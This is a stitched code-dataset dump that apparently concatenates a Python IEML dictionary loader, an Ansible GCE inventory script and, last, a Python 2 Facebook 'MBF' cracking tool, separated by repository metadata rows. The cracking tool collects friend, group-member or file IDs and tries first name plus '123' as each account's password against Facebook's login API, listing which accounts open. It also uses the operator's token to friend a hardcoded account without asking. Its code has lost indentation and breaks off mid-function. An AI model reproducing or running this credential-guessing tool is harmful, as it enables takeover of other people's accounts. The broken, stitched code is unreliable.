            # Cache hit: the folder digest is unchanged, reuse the pickle.
            if not cache.is_pruned():
                print("Dictionary.load: Reading cache at {}".format(cache.cache_file), file=sys.stderr)
                return cache.get()
            print("Dictionary.load: Dictionary files changed Recomputing cache.", file=sys.stderr)

        scripts = []
        translations = {'fr': {}, 'en': {}}
        comments = {'fr': {}, 'en': {}}

        # Record translations (and optional comments) for one yaml entry.
        def _add_metadatas(ieml, c):
            translations['fr'][ieml] = c['translations']['fr'].strip()
            translations['en'][ieml] = c['translations']['en'].strip()
            if 'comments' in c:
                if 'fr' in c['comments']: comments['fr'][ieml] = c['comments']['fr'].strip()
                if 'en' in c['comments']: comments['en'][ieml] = c['comments']['en'].strip()

        roots = []
        inhibitions = {}
        n_ss = 0
        n_p = 0
        for f in get_dictionary_files(folder):
            with open(f) as fp:
                d = yaml.load(fp)
                try:
                    # Each file describes one root paradigm plus its semes
                    # and sub-paradigms.
                    root = d['RootParadigm']['ieml']
                    inhibitions[root] = d['RootParadigm']['inhibitions']
                    roots.append(root)
                    _add_metadatas(root, d['RootParadigm'])
                    scripts.append(root)
                    if 'Semes' in d and d['Semes']:
                        for c in d['Semes']:
                            n_ss += 1
                            scripts.append(c['ieml'])
                            _add_metadatas(c['ieml'], c)
                    if 'Paradigms' in d and d['Paradigms']:
                        for c in d['Paradigms']:
                            n_p += 1
                            scripts.append(c['ieml'])
                            _add_metadatas(c['ieml'], c)
                except (KeyError, TypeError):
                    raise ValueError("'{}' is not a valid dictionary yaml file".format(f))

        print("Dictionary.load: Read {} root paradigms, {} paradigms and {} semes".format(len(roots), n_p, n_ss), file=sys.stderr)
        print("Dictionary.load: Computing table structure and relations ...", file=sys.stderr)
        dictionary = cls(scripts=scripts,
                         translations=translations,
                         root_paradigms=roots,
                         inhibitions=inhibitions,
                         comments=comments)
        print("Dictionary.load: Computing table structure and relations", file=sys.stderr)

        if use_cache:
            print("Dictionary.load: Updating cache at {}".format(cache.cache_file), file=sys.stderr)
            cache.update(dictionary)

        return dictionary

    def __init__(self,
                 scripts: List[str],
                 root_paradigms: List[str],
                 translations: Dict[str, Dict[str, str]],
                 inhibitions: Dict[str, List[str]],
                 comments: Dict[str, Dict[str, str]]):
        # All scripts, parsed and sorted; index maps script -> position.
        self.scripts = np.array(sorted(script(s) for s in scripts))
        self.index = {e: i for i, e in enumerate(self.scripts)}

        # Boolean-ish mask (0/1) marking which scripts are root paradigms.
        self.roots_idx = np.zeros((len(self.scripts),), dtype=int)
        self.roots_idx[[self.index[r] for r in root_paradigms]] = 1

        # scripts to translations
        self.translations = {s: Translations(fr=translations['fr'][s], en=translations['en'][s]) for s in self.scripts}

        # scripts to comments (empty string when missing for a language)
        self.comments = {s: Comments(fr=comments['fr'][s] if s in comments['fr'] else '',
                                     en=comments['en'][s] if s in comments['en'] else '') for s in self.scripts}

        # map of root paradigm script -> inhibitions list values
        self._inhibitions = inhibitions

        # Derived structures: table layout and the relations graph.
        self.tables = TableStructure(self.scripts, self.roots_idx)
        self.relations = RelationsGraph(dictionary=self)

    def __len__(self):
        return self.scripts.__len__()

    # def one_hot(self, s):
    #     return np.eye(len(self), dtype=int)[self.index[s]]

    def __getitem__(self, item):
        # Accepts a string or script; returns the canonical stored script.
        return self.scripts[self.index[script(item)]]

    def __contains__(self, item):
        return item in self.index
if __name__ == '__main__':
d = Dictionary.load()
for s in d.scripts:
print("en", d.translations[s]['en']) | [
"louis.vanbeurden@gmail.com"
] | louis.vanbeurden@gmail.com |
27ad7540d3a8c2ba45524d727a0a1bdf448d9b89 | 51a5ea9129b5df011667ea0d81d09b3963cdeedb | /inventory/gce.py | 7f3e1eaac270234bfd35a3854491a05ffa3631b0 | [] | no_license | lpereir4/mStakx | 227d746afa52c1086e78360c33891a3b84d2e75f | 415d0fe542a6b86e3a02699485b77e7519629213 | refs/heads/master | 2020-06-22T16:03:45.048666 | 2019-08-12T14:08:39 | 2019-08-12T14:08:39 | 197,742,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,274 | py | #!/usr/bin/env python
# Copyright: (c) 2013, Google Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
'''
GCE external inventory script
=================================
Generates inventory that Ansible can understand by making API requests
Google Compute Engine via the libcloud library. Full install/configuration
instructions for the gce* modules can be found in the comments of
ansible/test/gce_tests.py.
When run against a specific host, this script returns the following variables
based on the data obtained from the libcloud Node object:
- gce_uuid
- gce_id
- gce_image
- gce_machine_type
- gce_private_ip
- gce_public_ip
- gce_name
- gce_description
- gce_status
- gce_zone
- gce_tags
- gce_metadata
- gce_network
- gce_subnetwork
When run in --list mode, instances are grouped by the following categories:
- zone:
zone group name examples are us-central1-b, europe-west1-a, etc.
- instance tags:
An entry is created for each tag. For example, if you have two instances
with a common tag called 'foo', they will both be grouped together under
the 'tag_foo' name.
- network name:
the name of the network is appended to 'network_' (e.g. the 'default'
network will result in a group named 'network_default')
- machine type
types follow a pattern like n1-standard-4, g1-small, etc.
- running status:
group name prefixed with 'status_' (e.g. status_running, status_stopped,..)
- image:
when using an ephemeral/scratch disk, this will be set to the image name
used when creating the instance (e.g. debian-7-wheezy-v20130816). when
your instance was created with a root persistent disk it will be set to
'persistent_disk' since there is no current way to determine the image.
Examples:
Execute uname on all instances in the us-central1-a zone
$ ansible -i gce.py us-central1-a -m shell -a "/bin/uname -a"
Use the GCE inventory script to print out instance specific information
$ contrib/inventory/gce.py --host my_instance
Author: Eric Johnson <erjohnso@google.com>
Contributors: Matt Hite <mhite@hotmail.com>, Tom Melendez <supertom@google.com>,
John Roach <johnroach1985@gmail.com>
Version: 0.0.4
'''
try:
import pkg_resources
except ImportError:
# Use pkg_resources to find the correct versions of libraries and set
# sys.path appropriately when there are multiversion installs. We don't
# fail here as there is code that better expresses the errors where the
# library is used.
pass
USER_AGENT_PRODUCT = "Ansible-gce_inventory_plugin"
USER_AGENT_VERSION = "v2"
import sys
import os
import argparse
from time import time
from ansible.module_utils.six.moves import configparser
import logging
logging.getLogger('libcloud.common.google').addHandler(logging.NullHandler())
import json
try:
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
_ = Provider.GCE
except Exception:
sys.exit("GCE inventory script requires libcloud >= 0.13")
class CloudInventoryCache(object):
    """JSON file cache for cloud inventory data with an age-based validity
    check."""

    def __init__(self, cache_name='ansible-cloud-cache', cache_path='/tmp',
                 cache_max_age=300):
        # Resolve '~' and make sure the cache directory exists.
        directory = os.path.expanduser(cache_path)
        if not os.path.exists(directory):
            os.makedirs(directory)

        self.cache_path_cache = os.path.join(directory, cache_name)
        self.cache_max_age = cache_max_age

    def is_valid(self, max_age=None):
        ''' Determines if the cache files have expired, or if it is still valid '''

        limit = self.cache_max_age if max_age is None else max_age
        if not os.path.isfile(self.cache_path_cache):
            return False
        # Fresh while (mtime + allowed age) is still in the future.
        return os.path.getmtime(self.cache_path_cache) + limit > time()

    def get_all_data_from_cache(self, filename=''):
        ''' Reads the JSON inventory from the cache file. Returns Python dictionary. '''

        target = filename or self.cache_path_cache
        with open(target, 'r') as cache:
            return json.loads(cache.read())

    def write_to_cache(self, data, filename=''):
        ''' Writes data to file as JSON. Returns True. '''

        target = filename or self.cache_path_cache
        with open(target, 'w') as cache:
            cache.write(json.dumps(data))
        return True
class GceInventory(object):
    def __init__(self):
        """Run the whole inventory script: read config, populate or load the
        cache, print the requested JSON (single host or full inventory) and
        exit the process."""
        # Cache object (populated later from configuration)
        self.cache = None
        # dictionary containing inventory read from disk
        self.inventory = {}

        # Read settings and parse CLI arguments
        self.parse_cli_args()
        self.config = self.get_config()
        self.drivers = self.get_gce_drivers()
        self.ip_type = self.get_inventory_options()
        if self.ip_type:
            self.ip_type = self.ip_type.lower()

        # Cache management: refresh from the API when forced or expired,
        # otherwise serve the cached inventory.
        start_inventory_time = time()
        cache_used = False
        if self.args.refresh_cache or not self.cache.is_valid():
            self.do_api_calls_update_cache()
        else:
            self.load_inventory_from_cache()
            cache_used = True
            self.inventory['_meta']['stats'] = {'use_cache': True}
        self.inventory['_meta']['stats'] = {
            'inventory_load_time': time() - start_inventory_time,
            'cache_used': cache_used
        }

        # Just display data for specific host
        if self.args.host:
            print(self.json_format_dict(
                self.inventory['_meta']['hostvars'][self.args.host],
                pretty=self.args.pretty))
        else:
            # Otherwise, assume user wants all instances grouped
            # NOTE(review): `zones` is computed but never used here —
            # presumably filtering happens elsewhere; verify before removing.
            zones = self.parse_env_zones()
            print(self.json_format_dict(self.inventory,
                                        pretty=self.args.pretty))
        sys.exit(0)
def get_config(self):
"""
Reads the settings from the gce.ini file.
Populates a ConfigParser object with defaults and
attempts to read an .ini-style configuration from the filename
specified in GCE_INI_PATH. If the environment variable is
not present, the filename defaults to gce.ini in the current
working directory.
"""
gce_ini_default_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "gce.ini")
gce_ini_path = os.environ.get('GCE_INI_PATH', gce_ini_default_path)
# Create a ConfigParser.
# This provides empty defaults to each key, so that environment
# variable configuration (as opposed to INI configuration) is able
# to work.
config = configparser.ConfigParser(defaults={
'gce_service_account_email_address': '',
'gce_service_account_pem_file_path': '',
'gce_project_id': '',
'gce_zone': '',
'libcloud_secrets': '',
'instance_tags': '',
'inventory_ip_type': '',
'cache_path': '~/.ansible/tmp',
'cache_max_age': '300'
})
if 'gce' not in config.sections():
config.add_section('gce')
if 'inventory' not in config.sections():
config.add_section('inventory')
if 'cache' not in config.sections():
config.add_section('cache')
config.read(gce_ini_path)
#########
# Section added for processing ini settings
#########
# Set the instance_states filter based on config file options
self.instance_states = []
if config.has_option('gce', 'instance_states'):
states = config.get('gce', 'instance_states')
# Ignore if instance_states is an empty string.
if states:
self.instance_states = states.split(',')
# Set the instance_tags filter, env var overrides config from file
# and cli param overrides all
if self.args.instance_tags:
self.instance_tags = self.args.instance_tags
else:
self.instance_tags = os.environ.get(
'GCE_INSTANCE_TAGS', config.get('gce', 'instance_tags'))
if self.instance_tags:
self.instance_tags = self.instance_tags.split(',')
# Caching
cache_path = config.get('cache', 'cache_path')
cache_max_age = config.getint('cache', 'cache_max_age')
# TOOD(supertom): support project-specific caches
cache_name = 'ansible-gce.cache'
self.cache = CloudInventoryCache(cache_path=cache_path,
cache_max_age=cache_max_age,
cache_name=cache_name)
return config
def get_inventory_options(self):
"""Determine inventory options. Environment variables always
take precedence over configuration files."""
ip_type = self.config.get('inventory', 'inventory_ip_type')
# If the appropriate environment variables are set, they override
# other configuration
ip_type = os.environ.get('INVENTORY_IP_TYPE', ip_type)
return ip_type
def get_gce_drivers(self):
"""Determine the GCE authorization settings and return a list of
libcloud drivers.
"""
# Attempt to get GCE params from a configuration file, if one
# exists.
secrets_path = self.config.get('gce', 'libcloud_secrets')
secrets_found = False
try:
import secrets
args = list(secrets.GCE_PARAMS)
kwargs = secrets.GCE_KEYWORD_PARAMS
secrets_found = True
except Exception:
pass
if not secrets_found and secrets_path:
if not secrets_path.endswith('secrets.py'):
err = "Must specify libcloud secrets file as "
err += "/absolute/path/to/secrets.py"
sys.exit(err)
sys.path.append(os.path.dirname(secrets_path))
try:
import secrets
args = list(getattr(secrets, 'GCE_PARAMS', []))
kwargs = getattr(secrets, 'GCE_KEYWORD_PARAMS', {})
secrets_found = True
except Exception:
pass
if not secrets_found:
args = [
self.config.get('gce', 'gce_service_account_email_address'),
self.config.get('gce', 'gce_service_account_pem_file_path')
]
kwargs = {'project': self.config.get('gce', 'gce_project_id'),
'datacenter': self.config.get('gce', 'gce_zone')}
# If the appropriate environment variables are set, they override
# other configuration; process those into our args and kwargs.
args[0] = os.environ.get('GCE_EMAIL', args[0])
args[1] = os.environ.get('GCE_PEM_FILE_PATH', args[1])
args[1] = os.environ.get('GCE_CREDENTIALS_FILE_PATH', args[1])
kwargs['project'] = os.environ.get('GCE_PROJECT', kwargs['project'])
kwargs['datacenter'] = os.environ.get('GCE_ZONE', kwargs['datacenter'])
gce_drivers = []
projects = kwargs['project'].split(',')
for project in projects:
kwargs['project'] = project
gce = get_driver(Provider.GCE)(*args, **kwargs)
gce.connection.user_agent_append(
'%s/%s' % (USER_AGENT_PRODUCT, USER_AGENT_VERSION),
)
gce_drivers.append(gce)
return gce_drivers
def parse_env_zones(self):
'''returns a list of comma separated zones parsed from the GCE_ZONE environment variable.
If provided, this will be used to filter the results of the grouped_instances call'''
import csv
reader = csv.reader([os.environ.get('GCE_ZONE', "")], skipinitialspace=True)
zones = [r for r in reader]
return [z for z in zones[0]]
def parse_cli_args(self):
''' Command line argument processing '''
parser = argparse.ArgumentParser(
description='Produce an Ansible Inventory file based on GCE')
parser.add_argument('--list', action='store_true', default=True,
help='List instances (default: True)')
parser.add_argument('--host', action='store',
help='Get all information about an instance')
parser.add_argument('--instance-tags', action='store',
help='Only include instances with this tags, separated by comma')
parser.add_argument('--pretty', action='store_true', default=False,
help='Pretty format (default: False)')
parser.add_argument(
'--refresh-cache', action='store_true', default=False,
help='Force refresh of cache by making API requests (default: False - use cache files)')
self.args = parser.parse_args()
def node_to_dict(self, inst):
md = {}
if inst is None:
return {}
if 'items' in inst.extra['metadata']:
for entry in inst.extra['metadata']['items']:
md[entry['key']] = entry['value']
net = inst.extra['networkInterfaces'][0]['network'].split('/')[-1]
subnet = None
if 'subnetwork' in inst.extra['networkInterfaces'][0]:
subnet = inst.extra['networkInterfaces'][0]['subnetwork'].split('/')[-1]
# default to exernal IP unless user has specified they prefer internal
if self.ip_type == 'internal':
ssh_host = inst.private_ips[0]
else:
ssh_host = inst.public_ips[0] if len(inst.public_ips) >= 1 else inst.private_ips[0]
return {
'gce_uuid': inst.uuid,
'gce_id': inst.id,
'gce_image': inst.image,
'gce_machine_type': inst.size,
'gce_private_ip': inst.private_ips[0],
'gce_public_ip': inst.public_ips[0] if len(inst.public_ips) >= 1 else None,
'gce_name': inst.name,
'gce_description': inst.extra['description'],
'gce_status': inst.extra['status'],
'gce_zone': inst.extra['zone'].name,
'gce_tags': inst.extra['tags'],
'gce_metadata': md,
'gce_network': net,
'gce_subnetwork': subnet,
# Hosts don't have a public name, so we add an IP
'ansible_ssh_host': ssh_host
}
def load_inventory_from_cache(self):
''' Loads inventory from JSON on disk. '''
try:
self.inventory = self.cache.get_all_data_from_cache()
hosts = self.inventory['_meta']['hostvars']
except Exception as e:
print(
"Invalid inventory file %s. Please rebuild with -refresh-cache option."
% (self.cache.cache_path_cache))
raise
def do_api_calls_update_cache(self):
''' Do API calls and save data in cache. '''
zones = self.parse_env_zones()
data = self.group_instances(zones)
self.cache.write_to_cache(data)
self.inventory = data
def list_nodes(self):
all_nodes = []
params, more_results = {'maxResults': 500}, True
while more_results:
for driver in self.drivers:
driver.connection.gce_params = params
all_nodes.extend(driver.list_nodes())
more_results = 'pageToken' in params
return all_nodes
def group_instances(self, zones=None):
'''Group all instances'''
groups = {}
meta = {}
meta["hostvars"] = {}
for node in self.list_nodes():
# This check filters on the desired instance states defined in the
# config file with the instance_states config option.
#
# If the instance_states list is _empty_ then _ALL_ states are returned.
#
# If the instance_states list is _populated_ then check the current
# state against the instance_states list
if self.instance_states and not node.extra['status'] in self.instance_states:
continue
# This check filters on the desired instance tags defined in the
# config file with the instance_tags config option, env var GCE_INSTANCE_TAGS,
# or as the cli param --instance-tags.
#
# If the instance_tags list is _empty_ then _ALL_ instances are returned.
#
# If the instance_tags list is _populated_ then check the current
# instance tags against the instance_tags list. If the instance has
# at least one tag from the instance_tags list, it is returned.
if self.instance_tags and not set(self.instance_tags) & set(node.extra['tags']):
continue
name = node.name
meta["hostvars"][name] = self.node_to_dict(node)
zone = node.extra['zone'].name
# To avoid making multiple requests per zone
# we list all nodes and then filter the results
if zones and zone not in zones:
continue
if zone in groups:
groups[zone].append(name)
else:
groups[zone] = [name]
tags = node.extra['tags']
for t in tags:
if t.startswith('group-'):
tag = t[6:]
else:
tag = 'tag_%s' % t
if tag in groups:
groups[tag].append(name)
else:
groups[tag] = [name]
net = node.extra['networkInterfaces'][0]['network'].split('/')[-1]
net = 'network_%s' % net
if net in groups:
groups[net].append(name)
else:
groups[net] = [name]
machine_type = node.size
if machine_type in groups:
groups[machine_type].append(name)
else:
groups[machine_type] = [name]
image = node.image or 'persistent_disk'
if image in groups:
groups[image].append(name)
else:
groups[image] = [name]
status = node.extra['status']
stat = 'status_%s' % status.lower()
if stat in groups:
groups[stat].append(name)
else:
groups[stat] = [name]
for private_ip in node.private_ips:
groups[private_ip] = [name]
if len(node.public_ips) >= 1:
for public_ip in node.public_ips:
groups[public_ip] = [name]
groups["_meta"] = meta
return groups
def json_format_dict(self, data, pretty=False):
''' Converts a dict to a JSON object and dumps it as a formatted
string '''
if pretty:
return json.dumps(data, sort_keys=True, indent=2)
else:
return json.dumps(data)
# Run the script
if __name__ == '__main__':
GceInventory() | [
"lucien.pereira@colabrain.fr"
] | lucien.pereira@colabrain.fr |
f9ce32e3176a0497a3eaef6daa9ac60efd04cfbb | babced6fab78db2ff90bcadcc4c1e177fc2dba2f | /N0V4ID | 5bfc2e5d33003de8ca2a539f737d7ef8e0543be9 | [] | no_license | N0V4ID/new | cfe2cefe286144e0ca958d795597dbbc61e7f6dc | 0acfddaf2184173550ccc36a5e45fd582cd8760a | refs/heads/master | 2022-11-15T08:31:09.028607 | 2020-07-16T06:15:55 | 2020-07-16T06:15:55 | 280,065,024 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,175 | #!/usr/bin/python2
# coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.05)
logo = """ \x1b[1;93m______ \x1b[1;92m_______ \x1b[1;94m______ \x1b[1;91m___ _\n \x1b[1;93m| | \x1b[1;92m| _ |\x1b[1;94m| _ | \x1b[1;91m| | | |\n \x1b[1;93m| _ |\x1b[1;92m| |_| |\x1b[1;94m| | || \x1b[1;91m| |_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |_||_ \x1b[1;91m| _|\n \x1b[1;93m| |_| |\x1b[1;92m| |\x1b[1;94m| __ |\x1b[1;91m| |_ \n \x1b[1;93m| |\x1b[1;92m| _ |\x1b[1;94m| | | |\x1b[1;91m| _ |\n \x1b[1;93m|______| \x1b[1;92m|__| |__|\x1b[1;94m|___| |_|\x1b[1;91m|___| |_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n ✫╬─ \x1b[1;92mReCode \x1b[1;91m: \x1b[1;93 N0V4ID \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mFB \x1b[1;92m \x1b[1;91m: \x1b[1;96mFacebook.com/N0V4ID \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mGitHub \x1b[1;91m: \x1b[1;94mGithub.com/H2CK8D \x1b[1;95m─╬✫\n ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
def siapa():
os.system('clear')
nama = raw_input("\033[1;97mSiapa nama kamu ? \033[1;91m: \033[1;92m")
if nama =="":
print"\033[1;96m[!] \033[1;91mIsi yang benar"
time.sleep(1)
siapa()
else:
os.system('clear')
jalan("\033[1;97mSelamat datang \033[1;92m" +nama+ "\n\033[1;97mTerimakasih telah menggunakan tools ini !!")
time.sleep(1)
loginSC()
def loginSC():
os.system('clear')
print"\033[1;97mSilahkan login SC nya dulu bosque\n"
username = raw_input("\033[1;96m[*] \033[1;97mUsername \033[1;91m: \033[1;92m")
password = raw_input("\033[1;96m[*] \033[1;97mPassword \033[1;91m: \033[1;92m")
if username =="dark" and password =="fb":
print"\033[1;96m[✓] \033[1;92mLogin success"
time.sleep(1)
login()
else:
print"\033[1;96m[!] \033[1;91mSalah!!"
time.sleep(1)
LoginSC()
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FACEBOOK ANDA \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://www.youtube.com/omaliptv')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Hack facebook MBF"
print "\x1b[1;97m2.\x1b[1;93m Lihat daftar grup "
print "\x1b[1;97m3.\x1b[1;93m Informasi akun "
print "\x1b[1;97m4.\x1b[1;93m Yahoo clone "
print "\n\x1b[1;91m0.\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
informasi()
elif unikers =="4":
yahoo()
elif unikers =="0":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Crack dari teman"
print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup"
print "\x1b[1;97m4.\x1b[1;93m Crack dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n'
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
